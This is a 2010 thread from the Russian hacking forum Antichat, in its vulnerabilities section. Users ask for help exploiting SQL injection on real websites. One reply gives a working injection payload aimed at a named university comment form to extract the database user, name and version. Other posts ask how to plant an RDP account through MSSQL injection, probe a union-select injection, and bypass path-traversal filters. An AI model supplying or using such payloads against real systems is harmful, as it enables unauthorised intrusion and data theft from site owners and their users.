ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11091  
Старый 05.01.2010, 06:51
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

я отправляю этот файл(это у меня txt файл) открываю его прямо в maile и он открывает только код.
 
Ответить с цитированием

  #11092  
Старый 05.01.2010, 07:22
Аватар для ZavuloN
ZavuloN
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме:
29882

Репутация: 0
По умолчанию

А чего ты собственно хотел? Это конечно интересно отправлять файл и ждать что он выполнится... Учи матчасть, потом заходи.
 
Ответить с цитированием

  #11093  
Старый 05.01.2010, 10:51
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от Strilo4ka  
если не обрезаеться ".', толку то никакого, выше теущего каталого не поднимаешся поидеи!
Пробелы неззя использовать ежу понятно, тоесть вместе должно быть поидеи ".." чтоб перейти в надкаталог, скорее всего регулярка на любое входнеие точки так зачастую, правильно!
может быть обрезаеться слеш , тоесть "/", то можно заменить на "\" если ось win или "\\" если строка в регулярке в двойных кавычках, может быть в начале идет проверка на прямой слеш в регулярке, а потом точка и т.д тоесть если поставить обратный слеш, то фильтр обойдет в win например, а так хз,
вот в win пример:

cd /.. и cd \.. одинаковый результат в win

можно еще попытаться в url-виде может поможет если какой то ids херовый потому что в скрипте если с query_string достаеш то пхп сам в нормальный вид преобразовывает, а тогда идет сравнение...
если не прав то сори имхо мое мнение !!!
Какой еще слеш? Я, вроде, нормально сказал, обрезается двоеточие, обычным str_replace(), а ты стал про винду, про слеши, про регулярки придумывать.
 
Ответить с цитированием

  #11094  
Старый 05.01.2010, 17:22
Аватар для ronald
ronald
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727

Репутация: 83
Отправить сообщение для ronald с помощью ICQ
По умолчанию

Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Цитата:
Во время добавления комментария произошла неизвестная ошибкаINSERT INTO altx_main_comments (com_id, art_id, user_id, com_user, com_ip, com_time, com_text) VALUES ('', '59', '-1', 'ronald', '5b4c118a', '1262697678', ''')
 
Ответить с цитированием

  #11095  
Старый 05.01.2010, 17:26
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

вот интересует вопрос по поводу sql inj, как можно добавит имя польз и пасс на удаленого рабочего стола через реестр. Тоесть как примерно составит запрос к базе данных (MSSQL Server 2000) чтоб в последуюшем открыть доступ к RDP
есть привелегия sa

Последний раз редактировалось YuNi|[c; 05.01.2010 в 17:40..
 
Ответить с цитированием

  #11096  
Старый 05.01.2010, 17:56
Аватар для ronald
ronald
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727

Репутация: 83
Отправить сообщение для ronald с помощью ICQ
По умолчанию

Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/
 
Ответить с цитированием

  #11097  
Старый 05.01.2010, 19:19
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от ronald  
Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Впиши в поле имя:
Цитата:
name', '1', '1', concat_ws(0x3a,user(),database(),version()))#
И по структуре запроса в поле "com_text" запишется concat_ws(0x3a,user(),database(),version()), тобишь юзер:БД:версия

Последний раз редактировалось mailbrush; 05.01.2010 в 19:21..
 
Ответить с цитированием

  #11098  
Старый 05.01.2010, 20:19
Аватар для Bagamut
Bagamut
Новичок
Регистрация: 26.02.2009
Сообщений: 3
Провел на форуме:
64450

Репутация: 0
По умолчанию

подскажите, как можно скачать себе на комп базу?
 
Ответить с цитированием

  #11099  
Старый 05.01.2010, 20:37
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

http://www.mysql.ru/docs/man/mysqldump.html
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #11100  
Старый 05.01.2010, 21:53
Аватар для recfrf
recfrf
Новичок
Регистрация: 22.08.2008
Сообщений: 10
Провел на форуме:
149978

Репутация: 6
По умолчанию

Подскажите как быть при такой скуле
ордером кол-во полей показывает, при вводе
.php?id=5+union+select+1,2-- принт полей не выводит, если сменить id на произвольный например 999, то приписывает id к названию таблицы и выдает ошибку, например Table 'sjc5292.table_999' doesn't exist, куда копать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ